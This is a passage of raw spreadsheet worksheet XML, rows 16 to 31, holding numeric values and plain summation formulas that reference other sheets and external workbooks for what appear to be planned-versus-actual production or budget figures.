        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'r'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'r'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]1'!$W$73</f>
        <v>63.25</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]1'!$X$73</f>
        <v>63.25</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]1'!$Y$73</f>
        <v>62.9173187892165</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]1'!$T$73</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]1'!$U$73</f>
        <v>33.3333333333333</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]1'!$V$73</f>
        <v>52.2912935323383</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]1'!$Q$73</f>
        <v>8.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]1'!$R$73</f>
        <v>8.00</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]1'!$S$73</f>
        <v>4204.22</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'r'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'r'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]1'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]1'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]1'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]1'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]1'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]1'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]1'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]1'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]1'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'r'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'r'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]1'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]1'!$X$74</f>
        <v>0</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]1'!$Y$74</f>
        <v>222.404925880448</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]1'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]1'!$U$74</f>
        <v>0</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]1'!$V$74</f>
        <v>6.98917910447761</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]1'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]1'!$R$74</f>
        <v>0</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]1'!$S$74</f>
        <v>561.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'r'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'r'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]1'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]1'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]1'!$Y$72</f>
        <v>9.09356725146199e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]1'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]1'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]1'!$V$72</f>
        <v>4.25373134328358e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]1'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]1'!$R$72</f>
        <v>1e-6</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]1'!$S$72</f>
        <v>0.000342</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'r'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'r'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]1'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]1'!$X$73</f>
        <v>1e-5</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]1'!$Y$73</f>
        <v>239.299858028557</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]1'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]1'!$U$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]1'!$V$73</f>
        <v>71.9120689303483</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]1'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]1'!$R$73</f>
        <v>1e-6</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]1'!$S$73</f>
        <v>5781.730342</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]1'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]1'!$E$22</f>
        <v>5445</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'r'!H21</f>
        <v>5445</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2114883</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]1'!$I$22</f>
        <v>7024.6</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'r'!K21</f>
        <v>7024.6</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2073478.6</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]1'!$L$22</f>
        <v>81473.71</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>173.348319148936</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]1'!$W$81</f>
        <v>264.202281904659</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]1'!$X$81</f>
        <v>264.202281904659</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]1'!$Y$81</f>
        <v>275.640193174172</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]1'!$T$81</f>
        <v>42.7071759259259</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]1'!$U$81</f>
        <v>42.7071759259259</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]1'!$V$81</f>
        <v>36.144440989497</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]1'!$Q$81</f>
        <v>10.2497222222222</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]1'!$R$81</f>
        <v>10.2497222222222</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]1'!$S$81</f>
        <v>2906.01305555556</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]1'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]1'!$E$17</f>
        <v>6566</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'r'!H22</f>
        <v>6566</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2037547</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]1'!$I$17</f>
        <v>6014.25</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'r'!K22</f>
        <v>6014.25</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1897475.63</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]1'!$L$17</f>
        <v>190518.102</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>95.259051</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]1'!$W$79</f>
        <v>105.514775730151</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]1'!$X$79</f>
        <v>105.514775730151</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]1'!$Y$79</f>
        <v>102.274389686212</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]1'!$T$79</f>
        <v>67.0127314814815</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]1'!$U$79</f>
        <v>67.0127314814815</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]1'!$V$79</f>
        <v>45.4433077667219</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]1'!$Q$79</f>
        <v>16.0830555555556</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]1'!$R$79</f>
        <v>16.0830555555556</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]1'!$S$79</f>
        <v>3653.64194444444</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]1'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]1'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'r'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]1'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'r'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]1'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]1'!$W$80</f>
        <v>85.25</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]1'!$X$80</f>
        <v>85.25</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]1'!$Y$80</f>
        <v>79.1463491256534</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]1'!$T$80</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]1'!$U$80</f>
        <v>33.3333333333333</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]1'!$V$80</f>
        <v>32.4982068822554</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]1'!$Q$80</f>
        <v>8</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]1'!$R$80</f>
        <v>8</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]1'!$S$80</f>
        <v>2612.85583333333</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]1'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]1'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'r'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]1'!$I$56</f>
        <v>1462.47</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'r'!K24</f>
        <v>1462.47</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>281289</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]1'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]1'!$R$6</f>
        <v>85.3333333333333</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]1'!$S$6</f>
        <v>85.3333333333333</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]1'!$T$6</f>
        <v>86.1589991602576</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]1'!$O$6</f>
        <v>40.625</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]1'!$P$6</f>
        <v>40.625</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]1'!$Q$6</f>
        <v>52.2844527363184</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]1'!$L$6</f>
        <v>9.75</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]1'!$M$6</f>
        <v>9.75</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]1'!$N$6</f>
        <v>4203.67</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]1'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'r'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]1'!$I$69</f>
        <v>473.78</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'r'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]1'!$R$7</f>
        <v>192</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]1'!$S$7</f>
        <v>192</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]1'!$T$7</f>
        <v>187.582117535023</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]1'!$O$7</f>
        <v>40.625</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]1'!$P$7</f>
        <v>40.625</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]1'!$Q$7</f>
        <v>50.1533582089552</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]1'!$L$7</f>
        <v>9.75</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]1'!$M$7</f>
        <v>9.75</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]1'!$N$7</f>
        <v>4032.33</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'r'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'r'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]1'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]1'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]1'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]1'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]1'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]1'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]1'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]1'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]1'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'r'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'r'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]1'!$W$69</f>
        <v>22.3117848970252</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]1'!$X$69</f>
        <v>22.3117848970252</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]1'!$Y$69</f>
        <v>25.3717628987586</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]1'!$T$69</f>
        <v>26.375</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]1'!$U$69</f>
        <v>26.375</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]1'!$V$69</f>
        <v>68.2490049751244</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]1'!$Q$69</f>
        <v>6.33</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]1'!$R$69</f>
        <v>6.33</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]1'!$S$69</f>
        <v>5487.22</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'r'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'r'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]1'!$W$104</f>
        <v>28.5105086810861</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]1'!$X$104</f>
        <v>28.5105086810861</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]1'!$Y$104</f>
        <v>25.9559017184185</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]1'!$T$104</f>
        <v>100</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]1'!$U$104</f>
        <v>100</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]1'!$V$104</f>
        <v>64.4782338308458</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]1'!$Q$104</f>
        <v>24</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]1'!$R$104</f>
        <v>24</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]1'!$S$104</f>
        <v>5184.05</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'r'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'r'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]1'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]1'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]1'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]1'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]1'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]1'!$V$105</f>
        <v>34.8778855721393</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]1'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]1'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]1'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'r'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'r'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]1'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]1'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]1'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]1'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]1'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]1'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]1'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]1'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]1'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]1'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]1'!$E$16</f>
        <v>2608</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'r'!H31</f>
        <v>2608</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1375615</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]1'!$I$16</f>
        <v>6233.6</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'r'!K31</f>
        <v>6233.6</v>
      </c>
